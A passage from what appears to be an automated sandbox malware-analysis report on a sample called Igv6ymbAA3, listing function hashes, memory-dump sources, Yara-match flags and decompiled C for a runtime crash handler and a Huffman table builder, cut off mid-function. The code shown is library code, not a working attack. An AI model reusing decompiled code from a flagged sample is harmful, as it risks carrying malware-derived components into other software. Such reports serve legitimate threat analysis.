                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7cdf6ab6a34c8908dc8c3fb860d1cae89e96b79241a4c42548fc77b4acb02f1d
                                                                                                                                                                      • Instruction ID: ad40e0a5c93b8a46c23ed6ad48951fd4391e8db899653d0bdec72933a3ff4572
                                                                                                                                                                      • Opcode Fuzzy Hash: 7cdf6ab6a34c8908dc8c3fb860d1cae89e96b79241a4c42548fc77b4acb02f1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 44E0EB739093601FC348CBA804505CEBFB2CA01360B0140CFD048EB282D9300706C391
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561938 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5c6619e1ddc131c005d1a16a2f2e25b52a26c73ca3dcab16258022845422b43e
                                                                                                                                                                      • Instruction ID: 6c5c2b053ae0b94fe6129a710b937c6d3f3f54dc6466c81fff7070511667bb7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c6619e1ddc131c005d1a16a2f2e25b52a26c73ca3dcab16258022845422b43e
                                                                                                                                                                      • Instruction Fuzzy Hash: 61E02B204CE2844FC3024F64A51C3BCBF748F07130F2A48E6C4484BA23C1240453DF5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561980 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: df6379888e344063c311039341d8a855d0477e777a2863b343719419dc479fe7
                                                                                                                                                                      • Instruction ID: 5dffe96a17800452e23f66a868aa9f579be37e545176bcd8ada4845b36683e83
                                                                                                                                                                      • Opcode Fuzzy Hash: df6379888e344063c311039341d8a855d0477e777a2863b343719419dc479fe7
                                                                                                                                                                      • Instruction Fuzzy Hash: A6E04FB0901108EBCB50EFB9E81967EBBB6EB46314F148899C409D7200DA311E04DF59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561810 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ecc84c727b1765c1eb1bd0fa98d788796ed15095f7280658d1da2c926b0ecd8c
                                                                                                                                                                      • Instruction ID: 1150d207808e370bfd14f2fc37af4c42b916a650e15e00b1e58ba8d5642532b1
                                                                                                                                                                      • Opcode Fuzzy Hash: ecc84c727b1765c1eb1bd0fa98d788796ed15095f7280658d1da2c926b0ecd8c
                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0A72108D6404BCA465B94740A3F9FFF85F4A12EB5AC097D04D478528629C017DB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02567600 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8a5ffc14ae21e5109ec338334f7c61b2ca057d4365f3d2c0e8d725d05e0648ef
                                                                                                                                                                      • Instruction ID: fe8df8729f7e928a306c5c866d82618dc9509b0216aae17447cafe7414bf0d71
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a5ffc14ae21e5109ec338334f7c61b2ca057d4365f3d2c0e8d725d05e0648ef
                                                                                                                                                                      • Instruction Fuzzy Hash: 84E0D87510D0C04FC702BF38E4149593FA2FFC722034A12D9C4C08F2E6DB212809CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C0A0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bc94b2a6106e650e1267ff0088460a55b043e4320cc191f0cdd65bc5e3a7e987
                                                                                                                                                                      • Instruction ID: 44d171d34524a46d0d45e494ed36fe75f338c664d448094e2bf7968b90d95bc5
                                                                                                                                                                      • Opcode Fuzzy Hash: bc94b2a6106e650e1267ff0088460a55b043e4320cc191f0cdd65bc5e3a7e987
                                                                                                                                                                      • Instruction Fuzzy Hash: 2FD012336043286B8B48EAED54506DEBFAEDA84370B0141AED519DB280ED722A4083D9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02568C3A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4d8489e07a5d440a66701c42540b8f5338b3b9826e22e61f2f00ea27cc7ff00a
                                                                                                                                                                      • Instruction ID: 74b853eceb7393633f0be4b3bad721ebce179011dedf244599580c3bb7376291
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d8489e07a5d440a66701c42540b8f5338b3b9826e22e61f2f00ea27cc7ff00a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD02232710120070712226C380803C2C83CBC89703482BAAE831C33C4CD101C865B82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561948 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 60232e46643579bd812144ac5c72368959e47f609c61e0c884a56e1e3a74b6e1
                                                                                                                                                                      • Instruction ID: 47befa635c1c6c7dfaa8879976b2561a51ea1100c7bedfb03005591ab3f952a8
                                                                                                                                                                      • Opcode Fuzzy Hash: 60232e46643579bd812144ac5c72368959e47f609c61e0c884a56e1e3a74b6e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC012708562099BC6409F55A40C736BB6CD707215F14585994085320096314414DAAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561820 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 05427c28f30c438e3ca082b3d09da9811a9578538218006717f417156a4a6569
                                                                                                                                                                      • Instruction ID: ae9c53c0bd04a5b7f2b7c576ad948d78628651851cf5f74d5182498fb2e13c50
                                                                                                                                                                      • Opcode Fuzzy Hash: 05427c28f30c438e3ca082b3d09da9811a9578538218006717f417156a4a6569
                                                                                                                                                                      • Instruction Fuzzy Hash: 45B022300A0A0883CA002ECAB80C33AFBAC2B0A20BF088002C00C020000BB00028CEAE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C070 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b32418f94f63438dc8ec32de6045d189ad3538e31e197fa569f87056600ab8b8
                                                                                                                                                                      • Instruction ID: 1ea1ceefec567d4d85aff5fc7752de36b4e7ed512cd85dfc011a44d3d78f7e69
                                                                                                                                                                      • Opcode Fuzzy Hash: b32418f94f63438dc8ec32de6045d189ad3538e31e197fa569f87056600ab8b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB0121114A160A34D084130042C37C3401F1812163004D83648303B0088114101C565
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C07E Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5e3be3e550f88a6b811075fb9fc39230e9f19d3a5d6633474dabc780de9b19c4
                                                                                                                                                                      • Instruction ID: 78ba22e3aa3315d9420ae2032a53b78bf9b17c2925286570ddab98d31798b5c7
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3be3e550f88a6b811075fb9fc39230e9f19d3a5d6633474dabc780de9b19c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E900229610550478E085E20515D1683F2267D03013156454F01347940CE249501AE10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                      			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x96e20a3d
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x96e20a3d
				_v812 = _t12;
				_t13 =  *0x422238; // 0x691df5c2
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce09
                                                                                                                                                                      0x0040ce0f
                                                                                                                                                                      0x0040ce11
                                                                                                                                                                      0x0040ce11
                                                                                                                                                                      0x00413644
                                                                                                                                                                      0x00413649
                                                                                                                                                                      0x0041364f
                                                                                                                                                                      0x00413655
                                                                                                                                                                      0x0041365b
                                                                                                                                                                      0x00413661
                                                                                                                                                                      0x00413667
                                                                                                                                                                      0x0041366e
                                                                                                                                                                      0x00413675
                                                                                                                                                                      0x0041367c
                                                                                                                                                                      0x00413683
                                                                                                                                                                      0x0041368a
                                                                                                                                                                      0x00413691
                                                                                                                                                                      0x00413692
                                                                                                                                                                      0x0041369b
                                                                                                                                                                      0x004136a3
                                                                                                                                                                      0x004136ab
                                                                                                                                                                      0x004136b6
                                                                                                                                                                      0x004136c0
                                                                                                                                                                      0x004136c5
                                                                                                                                                                      0x004136ca
                                                                                                                                                                      0x004136d4
                                                                                                                                                                      0x004136de
                                                                                                                                                                      0x004136e3
                                                                                                                                                                      0x004136e9
                                                                                                                                                                      0x004136ee
                                                                                                                                                                      0x004136fa
                                                                                                                                                                      0x004136ff
                                                                                                                                                                      0x00413701
                                                                                                                                                                      0x00413709
                                                                                                                                                                      0x00413714
                                                                                                                                                                      0x00413721
                                                                                                                                                                      0x00413723
                                                                                                                                                                      0x00413725
                                                                                                                                                                      0x0041372a
                                                                                                                                                                      0x0041373e

                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241D070 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0242395B
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02423970
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0242397B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02423997
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0242399E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                      • Instruction ID: 9a1599a73148a1b7b2fd55f445f70218f5d4625b92489dfa8ca48e4d001b8ca4
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                      • Instruction Fuzzy Hash: B121C3B4A01204EFD720DF65E9496457FB0FB08356FC0407AE50D87662E7B86686CF4D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02418EC7 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: @$@$PA
                                                                                                                                                                      • API String ID: 0-3039612711
                                                                                                                                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                      • Instruction ID: b71b2f43c0705d8d2b76da7ccd9f842d4d99628e59700d8ec28352f7e30c6ce0
                                                                                                                                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                      • Instruction Fuzzy Hash: A1E16971A083528FD724DF28C49466BB7E1FFC8314F14492EE98A97350E775E989CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408C60 Relevance: 2.9, Strings: 2, Instructions: 377COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00408C60(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, signed int* _a20, signed short* _a24) {
				short _v30;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed short* _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed short _v122;
				signed int _v123;
				char _v124;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t216;
				signed int _t217;
				signed int _t219;
				intOrPtr _t220;
				signed int _t223;
				signed short _t225;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t240;
				signed int _t248;
				signed int _t251;
				void* _t254;
				signed int _t260;
				intOrPtr* _t261;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				short _t270;
				intOrPtr* _t281;
				signed char _t285;
				signed int _t297;
				signed int _t299;
				intOrPtr _t305;
				signed int _t308;
				signed int _t309;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t327;
				signed int _t333;
				signed int _t336;
				char _t337;
				intOrPtr* _t340;
				signed int* _t343;
				signed int _t344;
				signed short* _t345;
				signed int _t348;
				intOrPtr* _t349;
				signed short* _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				signed int _t353;
				void* _t354;

				_t354 =  &_v124;
				_t308 = _a12;
				_t352 = _a8;
				_v64 = 0xbadbad;
				_v60 = 0 << 0x10;
				_v56 = 0 << 0x10;
				_v52 = 0 << 0x10;
				_v48 = 0 << 0x10;
				_v44 = 0 << 0x10;
				_v40 = 0 << 0x10;
				_v36 = 0 << 0x10;
				_t211 = 0;
				if(_t308 > 0) {
					do {
						 *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) + 1;
						_t211 = _t211 + 1;
					} while (_t211 < _t308);
				}
				_t343 = _a20;
				_t212 =  *_t343;
				_v120 = _t212;
				_t263 = 0xf;
				while( *((short*)(_t354 + 0x48 + _t263 * 2)) == 0) {
					_t263 = _t263 - 1;
					if(_t263 >= 1) {
						continue;
					}
					break;
				}
				_v112 = _t263;
				if(_t212 > _t263) {
					_v120 = _t263;
				}
				if(_t263 != 0) {
					_t344 = 1;
					while(1) {
						__eflags =  *((short*)(_t354 + 0x48 + _t344 * 2));
						if( *((short*)(_t354 + 0x48 + _t344 * 2)) != 0) {
							break;
						}
						__eflags =  *((short*)(_t354 + 0x4a + _t344 * 2));
						if( *((short*)(_t354 + 0x4a + _t344 * 2)) != 0) {
							_t344 = _t344 + 1;
						} else {
							__eflags =  *((short*)(_t354 + 0x4c + _t344 * 2));
							if( *((short*)(_t354 + 0x4c + _t344 * 2)) != 0) {
								_t344 = _t344 + 2;
							} else {
								__eflags =  *((short*)(_t354 + 0x4e + _t344 * 2));
								if( *((short*)(_t354 + 0x4e + _t344 * 2)) != 0) {
									_t344 = _t344 + 3;
								} else {
									__eflags =  *((short*)(_t354 + 0x50 + _t344 * 2));
									if( *((short*)(_t354 + 0x50 + _t344 * 2)) != 0) {
										_t344 = _t344 + 4;
										__eflags = _t344;
									} else {
										_t344 = _t344 + 5;
										__eflags = _t344 - 0xf;
										if(_t344 <= 0xf) {
											continue;
										} else {
										}
									}
								}
							}
						}
						break;
					}
					__eflags = _v120 - _t344;
					if(_v120 < _t344) {
						_v120 = _t344;
					}
					_t309 = 1;
					_t213 = 1;
					while(1) {
						_t309 = _t309 + _t309 - ( *(_t354 + 0x48 + _t213 * 2) & 0x0000ffff);
						__eflags = _t309;
						if(_t309 < 0) {
							break;
						}
						_t213 = _t213 + 1;
						__eflags = _t213 - 0xf;
						if(_t213 <= 0xf) {
							continue;
						} else {
							_t333 = _a4;
							__eflags = _t309;
							if(_t309 <= 0) {
								L32:
								_v30 = 0;
								_t216 = 2;
								do {
									_t270 =  *((intOrPtr*)(_t354 + _t216 + 0x6c)) +  *((intOrPtr*)(_t354 + _t216 + 0x4c));
									_t216 = _t216 + 2;
									 *((short*)(_t354 + _t216 + 0x6c)) = _t270;
									__eflags = _t216 - 0x1e;
								} while (_t216 < 0x1e);
								_t264 = _a12;
								_t217 = 0;
								__eflags = _t264;
								if(_t264 > 0) {
									do {
										__eflags =  *(_t352 + _t217 * 2);
										if( *(_t352 + _t217 * 2) != 0) {
											 *(_a24 + ( *(_t354 + 0x6c + ( *(_t352 + _t217 * 2) & 0x0000ffff) * 2) & 0x0000ffff) * 2) = _t217;
											_t327 =  *(_t352 + _t217 * 2) & 0x0000ffff;
											_t75 = _t354 + 0x6c + _t327 * 2;
											 *_t75 =  *(_t354 + 0x6c + _t327 * 2) + 1;
											__eflags =  *_t75;
										}
										_t217 = _t217 + 1;
										__eflags = _t217 - _t264;
									} while (_t217 < _t264);
								}
								_t219 = _t333;
								__eflags = _t219;
								if(_t219 == 0) {
									_t220 = _a24;
									_v88 = _t220;
									_v96 = 0x13;
									goto L43;
								} else {
									__eflags = _t219 == 1;
									if(_t219 == 1) {
										_v88 = 0x41e28e;
										_t220 = 0x41e2ce;
										_v96 = 0x100;
										L43:
										_v92 = _t220;
									} else {
										_v88 = 0x41e510;
										_v92 = 0x41e550;
										_v96 = 0xffffffff;
									}
								}
								_v108 =  *_a16;
								_t223 = 1 << _v120;
								_v84 = 0xffffffff;
								_t353 = 0;
								_t265 = 0;
								_t97 = _t223 - 1; // 0x0
								_v116 = _t344;
								_v80 = 1;
								_v100 = 1;
								_v76 = _t97;
								__eflags = _t333 - 1;
								if(_t333 != 1) {
									L46:
									_v104 = _a24;
									while(1) {
										L47:
										_t345 = _v104;
										_t225 =  *_t345 & 0x0000ffff;
										_v123 = _v116 - _t265;
										__eflags = (_t225 & 0x0000ffff) - _v96;
										if(__eflags >= 0) {
											if(__eflags <= 0) {
												__eflags = 0;
												_v124 = 0x60;
												_v122 = 0;
											} else {
												_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
												_v124 =  *((intOrPtr*)(_t254 + _v92));
												_v122 =  *((intOrPtr*)(_t254 + _v88));
											}
										} else {
											_v124 = 0;
											_v122 = _t225;
										}
										_t226 = _v80;
										_v72 = _t226;
										_t336 = (_t353 >> _t265) + _t226;
										__eflags = _t336;
										_t281 = _v108 + _t336 * 4;
										_t337 = _v124;
										do {
											L53:
											_t226 = _t226 - 1;
											_t281 = _t281 - 4;
											 *_t281 = _t337;
											__eflags = _t226;
										} while (_t226 != 0);
										_t316 = _v116;
										_t228 = 1 << _t316 - 1;
										__eflags = _t353 & 0x00000001;
										if((_t353 & 0x00000001) != 0) {
											do {
												_t228 = _t228 >> 1;
												__eflags = _t353 & _t228;
											} while ((_t353 & _t228) != 0);
										}
										__eflags = _t228;
										if(_t228 == 0) {
											_t353 = 0;
											__eflags = 0;
										} else {
											_t132 = _t228 - 1; // 0x0
											_t353 = (_t132 & _t353) + _t228;
										}
										_v104 =  &(_v104[1]);
										 *(_t354 + 0x4c + _t316 * 2) =  *(_t354 + 0x4c + _t316 * 2) + 0xffff;
										__eflags =  *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff;
										if(( *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff) != 0) {
											L62:
											__eflags = _t316 - _v120;
											if(_t316 <= _v120) {
												L47:
												_t345 = _v104;
												_t225 =  *_t345 & 0x0000ffff;
												_v123 = _v116 - _t265;
												__eflags = (_t225 & 0x0000ffff) - _v96;
												if(__eflags >= 0) {
													if(__eflags <= 0) {
														__eflags = 0;
														_v124 = 0x60;
														_v122 = 0;
													} else {
														_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
														_v124 =  *((intOrPtr*)(_t254 + _v92));
